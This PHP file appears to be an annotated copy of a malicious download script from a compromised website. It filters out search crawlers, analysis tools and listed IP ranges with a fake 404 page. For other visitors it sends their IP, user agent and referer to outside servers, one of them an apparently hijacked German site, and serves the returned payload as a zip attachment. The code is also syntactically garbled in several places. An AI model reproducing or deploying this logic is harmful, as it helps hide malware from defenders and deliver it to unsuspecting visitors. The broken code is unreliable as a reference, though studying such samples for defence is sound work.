<?php

#error_reporting(0);

ini_set("display_errors",0);

$tries_per_url 1;

# URLs from which to fetch some information.
$urls = array(
    
"http://78.138.118.124/request12.php",
    
"http://bahnsinn-hattersheim.de/mediapool/85/859783/resources/pictures/126865.php",
    
"http://78.138.118.125/request12.php"
);

// Refuse to service requests that have any one of these substrings
// in the request's user agent string.
$bad_uas = array(
        
"Googlebot""urllib""Wget",
        
"Mac OS X""Android""Linux",
        
"iPhone""iPad""bingbot",
        
"BlackBerry""Googlebot""Sam Spade",
        
"Macintosh""Phone""oBot""AppEngine",
        
"msnbot""Http Browser",
        
"curl""Python""perl""GetRight",
        
"PycURL""Anonymous""Ruby""spider",
        
"MSIECrawler""Genieo",
        
"PlayBook""Java",
        
"URLRedirect""MIDP",
        
"LSSRocketCrawler""X11""Gnome""KDE",
    );

# Refuse to service requests from these IP addresses.
$bad_ips = array(
        
"10.1.79.","103.246.36.",
        
"117.27.141.","117.27.151.",
        
"118.145.2.","118.145.5.",
        
"121.54.58.","123.196.112.",
        
"125.77.194."#"127.0.0.",
        
"167.182.124.","167.182.57.",
        
"183.12.177.","184.173.241.",
        
"184.179.122.","188.244.35.",
        
"192.168.1.","192.168.2.",
        
"193.190.154.","194.47.174.",
        
"195.159.140.","195.93.102.",
        
"195.93.18.","195.93.21.",
        
"195.93.60.","198.208.159.",
        
"198.208.251.","199.47.168.",
        
"201.238.246.","205.188.116.","
        205.188.117."
,"207.158.41.",
        
"207.200.112.","208.122.95.",
        
"208.50.101.","208.64.138.",
        
"208.80.194.","209.191.87.",
        
"210.51.187.","217.69.132.",
        
"211.152.42.","218.107.207.",
        
"218.5.78.","218.85.137.",
        
"218.85.138.","219.239.95.",
        
"220.181.31.","222.76.212.",
        
"222.76.215.","222.76.218.",
        
"5.9.208.","59.60.7.",
        
"64.12.116.","64.12.117.",
        
"64.124.203.","66.150.14.",
        
"66.230.194.","66.230.196.",
        
"66.230.220.","74.217.148.",
        
"74.55.187.","unknown",
        
"95.25.186.227","46.188.5.190",
        
"94.29.6.193","188.244.38.86",
        
"95.26.90.168","95.25.210.239",
        
"95.26.90.193",
    );

PhpDisplay("http://localhost/");

function 
IsClientBad($ip$ua$path
{
    
error_log('IsClientBad('.$ip.', "'.$ua.'", "'.$path.'")');

    global 
$bad_ips$bad_uas$tokens_param;

    
$tokens_param explode("?"$path);

    
# Needs GET parameters
    
if (count($tokens_param) != 2) {
        
error_log("IsClientBad 1");
        return 
TRUE;
    }

    
$tokens_param explode("="$tokens_param[1]);

    
# Needs exactly one name/value pair
    
if (count($tokens_param) != 2) {
        
error_log("IsClientBad 2");
        return 
TRUE;
    }

    
$tokens_param explode("_"$tokens_param[1]);

    
# The value has to have an '_' underscore in it.
    
if (count($tokens_param) != 2) {
        
error_log("IsClientBad 3");
        return 
TRUE;
    }

    
# user agent string at least 20 characters
    
if (strlen($ua) < 20) {
        
error_log("IsClientBad 4");
        return 
TRUE;
    }

    
# IP address not in list of bad IP addresses
    
foreach($bad_ips as $bad_ip) {
        if(
strstr($ip$bad_ip)) !== FALSE) {
            
error_log("IsClientBad 5");
            return 
TRUE;
        }
    }

    
# User agent doesn't have a "bad" substring in it.
    
foreach ($bad_uas as $bad_ua) {

        
$fcwbnsdghec "bad_ua";

        if (
strstr($ua$bad_ua) !== FALSE) {
            
error_log("IsClientBad 6");
            return 
TRUE;
        }
    }

    return 
FALSE;
}

# Based on the url-encoded $param, fetch some data from one of
# the URLs in global $urls.  Makes $tries_per_url attempts on
# each URL in the list, and then loops over the list $urls again
# and again.  The "path" (URI) get3.php gets called as is included
# in the params for some reason.
function GetData($param)
{
    global 
$urls;
    global 
$tries_per_url;

    while (
TRUE) {
        foreach (
$urls as $url) {
            
$full_url $url ."?" .$param;
            for (
$i 0$i $tries_per_url$i++) {
                    
$content file_get_contents($full_url);
                    if (!empty(
$content)) {
                        return 
$content;
                    }
            }
        }
    }

    return 
"";
}

function 
PhpDisplay($url)
{
    global 
$query;

    
# Fill in array $query with info about the request get3.php
    # currently services.
    
$query["ip"] = GetIp();  // IP address the request came from.
    
$query["time"] = date("d/M/Y:H:i:s",time());
    
$query["request"] = $_SERVER["REQUEST_METHOD"];
    
$query["path"] = $_SERVER["REQUEST_URI"];
    
$query["protocol"] = $_SERVER["SERVER_PROTOCOL"];
    
$query["useragent"] = $_SERVER["HTTP_USER_AGENT"];
    
$query["referer"] = isset($_SERVER["HTTP_REFERER"])? $_SERVER["HTTP_REFERER"] :"-";

    if (
IsClientBad($query["ip"], $query["useragent"], $query["path"])) {
        
error_log("Client bad 1");
        
Error404();
    }

    global 
$content;
    
$content GetData(http_build_query($query));

    if (empty(
$content) OR stripos($content,"error") !== FALSE) {
        
error_log("Client bad 2");
        
Error404();
    }

    
$content explode("\n",$content);
    
$filename array_shift($content);  // $filename: element 0 of array
    
$content implode("\n",$content);

    
header("Content-Type: application/zip";
    
header("Content-Disposition: attachment;filename=".$filename);
    
header("Content-Length: " strlen($content));

    echo 
$content;

    exit();
}

function 
Error404() {
    
header("HTTP/1.1 404 Not Found");
    exit(
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"."<html><head><title>404 Not Found</title></head><body>\r\n"."<h1>Not Found</h1>\r\n"."<p>The requested URL was not found on this server.</p>\r\n"."<hr>\r\n"."</body></html>\r\n");
}

function 
GetIp()
{
    global 
$ip;
    
$ip NULL;

    if(isset(
$_SERVER["HTTP_X_FORWARDED_FOR"])) {
        
$ip $_SERVER["HTTP_X_FORWARDED_FOR"];
    } elseif (isset(
$_SERVER["HTTP_CLIENT_IP"])) {
        
$ip $_SERVER["HTTP_CLIENT_IP"];
    } elseif (isset(
$_SERVER["REMOTE_ADDR"])) {
        
$ip $_SERVER["REMOTE_ADDR"];
    }

    if (
strpos($ip",") !== FALSE) {
        
# if $ip is a string rep of a comma-separated list, choose last element.
        
$ips explode(",",$ip);
        
$ip trim(array_pop($ips));
    }

    return 
$ip;
}
?>